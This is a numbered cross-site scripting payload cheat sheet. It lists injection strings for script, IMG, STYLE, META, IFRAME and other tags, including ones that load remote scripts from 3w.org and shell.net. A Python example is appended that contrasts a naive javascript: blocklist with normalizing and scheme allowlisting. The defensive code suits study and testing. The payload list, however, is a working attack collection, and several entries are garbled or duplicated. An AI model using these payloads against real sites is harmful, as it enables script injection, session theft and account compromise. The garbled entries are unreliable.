(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(99) Alternative alert pop-ups
<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag without semicolon or quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (the semicolons are required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>
(16) Working around character limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters are basically ineffective in China, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC=\'#\'" /span>
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
+ g E* @+ Y2 W: ](34)IMG Dynsrc& N2 l: L" A' w/ c+ x2 N2 s
<IMG DYNSRC=\'#\'" /span>4 e' ^2 x3 ^7 P, \: Z7 \ [: Q
. E4 R1 b8 i: x+ \# y( w% t
(35) IMG LOWSRC
<IMG LOWSRC=\'#\'" /span>
(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC=\'#\'" /IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by a letter is enough)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
expression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
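Most of the URL-attribute entries above ((3), (4), (5), (11) to (14), (17), (40)) exist because the filter they were written against looked for the literal string `javascript:` in the raw input. The Python below is an added example, not part of the original cheat sheet: it puts such a naive blocklist next to the mitigation that holds up, which is to decode and normalize the attribute value the way a browser does, allowlist the URL scheme, and HTML-escape every user-supplied value for its output context. The function names, the scheme allowlist in `SAFE_SCHEMES` and the sample inputs are my own constructed choices; the unsafe sample URLs are the variants the sheet lists.

```python
import html
import re
from urllib.parse import urlsplit

# Schemes an application link may carry. Everything else (javascript:, vbscript:,
# data:, ...) is refused. Assumption: this allowlist suits the page being rendered.
SAFE_SCHEMES = {"http", "https", "mailto"}

# ASCII control characters, space and DEL. Browsers skip tabs, newlines and leading
# controls when they read a URL, which is what the embedded tab/newline/CR and
# null-byte entries rely on; stripping all of them before parsing is the
# conservative choice for a filter.
_CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")


def naive_blocklist_allows(raw_url):
    """The filter a first attempt usually ends up with: reject only the literal,
    lowercase substring 'javascript:'. Included only for comparison."""
    return "javascript:" not in raw_url


def normalize_url(raw_url):
    """Bring an attribute value into the form the browser will actually parse:
    decode HTML entities (numeric, with or without semicolons), then drop the
    control characters and spaces the browser would ignore."""
    decoded = html.unescape(raw_url)
    return _CONTROL_CHARS.sub("", decoded)


def is_safe_link(raw_url):
    """Allowlist check on the normalized scheme. Relative URLs have no scheme
    and are allowed; any explicit scheme must be in SAFE_SCHEMES."""
    scheme = urlsplit(normalize_url(raw_url)).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


def render_text(user_text):
    """Text and attribute context: HTML-escape <, >, &, ' and ". This is what
    stops the plain <SCRIPT> injections and the double-bracket variant."""
    return html.escape(user_text, quote=True)


def render_link(raw_url, link_text):
    """Emit an <a> whose href has passed the scheme allowlist; a refused URL is
    replaced by '#'. The surviving URL and the link text are still escaped for
    their output context, because allowlisting the scheme does not make the
    rest of the value safe to splice into HTML."""
    href = raw_url if is_safe_link(raw_url) else "#"
    return '<a href="%s">%s</a>' % (render_text(href), render_text(link_text))


# Constructed sample inputs. The unsafe ones are the URL variants the cheat sheet
# lists (plain, mixed case, null byte, embedded tab, entity-encoded, VBScript).
SAMPLE_URLS = [
    "https://example.com/",                       # ordinary link: allowed
    "/relative/path",                             # relative: allowed
    "javascript:alert('XSS')",                    # (3) plain
    "JaVaScRiPt:alert('XSS')",                    # (4) case variation
    "java\x00script:alert('XSS')",                # (17) null character
    "jav\tascript:alert('XSS')",                  # (11) embedded tab
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",  # (5) entities
    "vbscript:msgbox",                            # (40) VBScript scheme
]


def audit_urls(urls=SAMPLE_URLS):
    """For each URL return (naive_blocklist_allows, is_safe_link) so the two
    filters can be compared side by side."""
    return {u: (naive_blocklist_allows(u), is_safe_link(u)) for u in urls}


if __name__ == "__main__":
    for url, (naive, allowlisted) in audit_urls().items():
        print("%-75r naive=%-5s allowlist=%s" % (url, naive, allowlisted))
```

Running the block prints one row per sample URL: the naive blocklist passes every variant except the plain lowercase one, while the normalize-then-allowlist check refuses all six unsafe inputs and still accepts the ordinary and relative links. The design point is that the check runs on the value the browser will see, not on the bytes the user typed, and that it names what is allowed rather than what is forbidden, so a new encoding trick cannot widen it.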